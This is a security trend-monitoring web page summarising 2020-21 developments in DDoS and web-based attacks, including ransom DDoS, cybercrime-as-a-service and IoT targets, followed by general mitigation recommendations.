- Home >
- Services >
- Access to Knowledge >
- Trend Monitor >
- Domain of Application >
- Trend snippet: Trends in DDoS and web-used attacks against availability and integrity
Trends in Security Information
The HSD Trendmonitor is designed to provide access to relevant content on various subjects in the safety and security domain, to identify relevant developments and to connect knowledge and organisations. The safety and security domain encompasses a vast number of subjects. Four relevant taxonomies (type of threat or opportunity, victim, source of threat and domain of application) have been constructed in order to visualize all of these subjects. The taxonomies and related category descriptions have been carefully composed according to other taxonomies, European and international standards and our own expertise.
In order to identify safety and security related trends, relevant reports and HSD news articles are continuously scanned, analysed and classified by hand according to the four taxonomies. This results in a wide array of observations, which we call ‘Trend Snippets’. Multiple Trend Snippets combined can provide insights into safety and security trends. The size of the circles shows the relative weight of the topic, the filters can be used to further select the most relevant content for you. If you have an addition, question or remark, drop us a line at info@securitydelta.nl.
visible on larger screens only
Please expand your browser window.
Or enjoy this interactive application on your desktop or laptop.
Trends in DDoS and web-used attacks against availability and integrity
Ransom Denial of Service (RDoS) is the new trend of DDoS attacks
During 2020, Ransom DDoS (RDDoS) campaigns got a substantial boost from August 2020 onwards, with hacking groups such as Fancy Bear, Cozy Bear, Lazarus Group, and Armada Collective carrying out these campaigns. Targeted sectors include e-commerce, finance, and travel on a global scale. Ransom Denial of Service substantially reduces the need of resources to carry out an attack. Cybercriminals analyse target businesses to find those with weak and vulnerable systems. They then blackmail these businesses by asking a ransom so as not to attack the system.
COVID-19 Pandemic has been used as an amplifier
DDoS attacks were boosted substantially in 2020 due to COVID-19 with more than 10 million attacks (1.6 million more
than 2019) and a 22% increase in attack frequency in the last 6 months of 2020. Global DDoS extortion attacks also increased by 125% becoming one of the most critical approaches to DDoS. The bandwidth originally devoted to counteracting DDoS is currently used for remote working, reducing an enterprise’s ability to defend itself against a DDoS attack. In this context, the impact of DDoS attacks against RDPs and virtual private networks (VPNs) increased with the pandemic.
Cybercrime-as-a-Service works as an amplifier of web-based and DDoS attacks
Cybercrime-as-a-Service is becoming a cornerstone for spreading DDoS, opening the door of DDoS to a wider population of attackers. Illegal online markets providing accesses to attack tools and services, as well as fast internet connections are further supporting cybercriminals in driving more complex and sophisticated campaigns, and disruptive attacks. State-sponsored actors aim to develop their capabilities to disrupt critical infrastructure and conduct espionage against businesses, academia, and governments to steal intellectual property.
DDoS is increasingly targeting smaller businesses and requiring less financial and technical resources. Potentially disruptive attacks can target third-party providers (e.g. financial, energy and telecommunication services), with cascading effects in the supply chain.
Traditional DDoS is moving towards mobile networks and IoT
The success of internet of things (IoT) in conjunction with 5G is resulting in a new wave of DDoS attacks, possibly inducing victims to pay a ransom. On one hand, 5G makes IoT more vulnerable to cyberattacks, supporting localised DDoS where an attacker interferes with the connectivity of a specific area covered by a slice through a set of compromised devices. On the other hand, IoT can be used as a threat vector for DDoS.
Sensors and devices are in fact a suitable target of DDoS attacks due to their limited resources that often result in poor security protection. Lack of industry standards, network capabilities, and hardware can challenge service uptime and reliability. This problem is exacerbated in IIoT, where vulnerabilities in third-party software components clearly point to a lack of standardisation and safe coding guidelines.
New amplifiers and advanced sophistication for DDoS attacks emerge
Sharing of resources in virtualised environments acts as an amplifier of DDoS attacks. Physical resource overloading can cause disruption in communications, services, and access to data. DDoS attackers are adopting intelligent strategies based on technically advanced and smart attacks. In 2020-21, smart attacks used publicly available information to monitor the countermeasures adopted by their targets and adapt their attack strategies at run time.
DDoS campaigns in 2021 have become more targeted, multi-vector and persistent
The attackers look for weaknesses to exploit and try different attack vector combinations. 65% of DDoS attacks were multi-vector. Independently from the statistics, DDoS attacks are increasingly becoming multi-vector. NEUSTAR shares the view that the majority of attack vectors for DDoS attacks focus on UDP protocols, such as Network Time Protocol (NTP), Connection-less Lightweight Directory Access Protocol (CLDAP), Internet Control Message Protocol (ICMP) and Domain Name System (DNS).
Smaller organisations are being targeted
DDoS is increasingly targeting small enterprises by building on the rental of skill and tools to implement attacks
(Cybercrime-as-a-Service). This finding was previously discussed in IOCTA 2020, claiming that cybercriminals increasingly target smaller organisations with lower security standards, ensuring successful attacks with smaller volumes of data and maximum revenue. Public institutions and critical infrastructures remain among the main targets of DDoS attacks.
Increased combination of web-based and DDoS attacks
Recalling that DDoS and web-based attacks are often coordinated activities, web applications are still vulnerable to web-related threats, such as injections and cross-site scripting, and can become a vector for DDoS attacks. According to a recent report, SQL injection vulnerabilities and PHP injection vulnerabilities are the most commonly exploited, though XSS is the most discovered vulnerability. According to the Verizon 2020 Data Breach Investigations Report (DBIR), cross-site scripting (XSS) traffic experienced a substantial increase in Q4 2020; blocked cross-site scripting (XSS) traffic nearly doubled in volume from Q2 2020 to Q4 2020, with more than 15 million attacks, representing 10% of blocked traffic. Furthermore, 43% of all data breaches involved a web application and around 90% of all hacking vectors targeted web applications.
Web-based attack main trends persist
Web Attacks includes threats, such as injection and application malfunctioning, affecting IT systems in their entirety. Modern IT systems are based on services composed at run time, which can be the target of attacks and breaches. These services often expose a standard API interface (e.g. REST, RPC) and interact on virtual networks or orchestration platforms, introducing new security challenges to cope with. At the same time, “traditional” (i.e. desktop, client-side) applications suffer from long-standing issues that are still a source of bugs and attacks. Though web attacks have remained stable over the years, we can note some interesting points as follows.
-
Security Misconfiguration. Unpatched software, use of default accounts or unused pages are the preferred means exploited by attackers to bypass security protections and gain unauthorised access to systems. These holes can be found at all layers of a system and are difficult to manage.
-
Automated brute force, dictionary, and session management attacks are increasingly adopted. For instance, Remote Desktop Protocols (RDPs) are exploited by attackers for malware infection; to do this, attackers search for specific open ports in order to implement brute force attacks.
-
Cyber-attackers are turning security defences into weapons. For instance, secure channels can be used to cover malware distribution, to disrupt secured transactions, and for data exfiltration.
-
Untrusted compositions. Composite services are increasingly composed of atomic services to provide advanced functionalities, while introducing new risks that go beyond the risks faced by atomic services. On one hand, composite services can increase the risk of data breaches by combining the different sources of information they have. On the other hand, the composition of atomic services could entail an endemic risk
related to the fact that the strength of a composite application is the one of its weakest link.
Recommendations
Both DDoS and web-based attacks are long-standing threats and several mitigation measures are well known and established. In summary, we present in the following some fundamental mitigation vectors for DDoS and web-based attacks, with a particular focus on trends that emerged during the reporting period.
-
A denial-of-service response plan is fundamental for organisations where resilience is a priority and should integrate system checklists, response teams, and efficient communication and escalation procedures.
-
The security process should be a continuous activity that follows and adapts system and network evolutions and life cycles.
-
Collaboration and coordination between relevant organisations is important to multiply and strengthen mitigation efforts.
-
Implement DDoS protection using an on-premises solution, DDoS scrubbing service, or a hybrid solution.
-
Use both network and web application firewalls. The first can be coupled with approaches mitigating
peaked traffic such as a Content Delivery Network (CDN), a load balancer and scalable resources. The latter
is particularly useful in case DDoS is based on injection or XSS.
-
Use antivirus solutions to curb malware infections.
-
Use a network-based intrusion-detection system.
-
Apply patches promptly, especially when many employees use their personal machines for work.
Organisations should give high priority to system updates and deliver them to users remotely.
-
Traffic profiling and traffic filtering may assist in providing early warning signs of abnormal traffic patterns that
are an indicator of DDoS attacks.
-
Use DDoS mitigation services to detect abnormal traffic flows and redirects traffic away from your network,
as well as rate limiting to restrict the volume of incoming traffic.
-
Protect web-based APIs and monitor for related vulnerabilities.
-
Fortify DNS or even consider a managed DNS service. Cache poisoning or similar exploits can be prevented
by the use of DNSSEC, or even better a managed DNS vendor supporting the DNSSEC specification.
-
Consider a multi-layered solution mixing detection, investigation, and response capabilities across multiple
platforms.
-
Build a threat intelligence program based on a proactive approach that adapts the security posture to the
evolving threat environment.
-
Use staff training and cybersecurity exercises to increase capacity building and preparedness.
Countermeasures for mitigating web-based attacks are as follows:
-
Set up a web application firewall (WAF) to identify and filter malicious requests. WAF must be kept updated to protect the system against newly discovered vulnerabilities.
-
Strengthen the code base (e.g. input sanitisation, parametrised statements) to protect against injection- based attacks.
-
Promptly update software to avoid zero-day attacks.
-
Properly configure and harden web servers and regularly patch all servers exposed on the Internet.
-
Continuously verify the effectiveness of your security hardening, using attack tools, vulnerability scanners, and
penetration test services.
-
Enable logging and inspect those logs.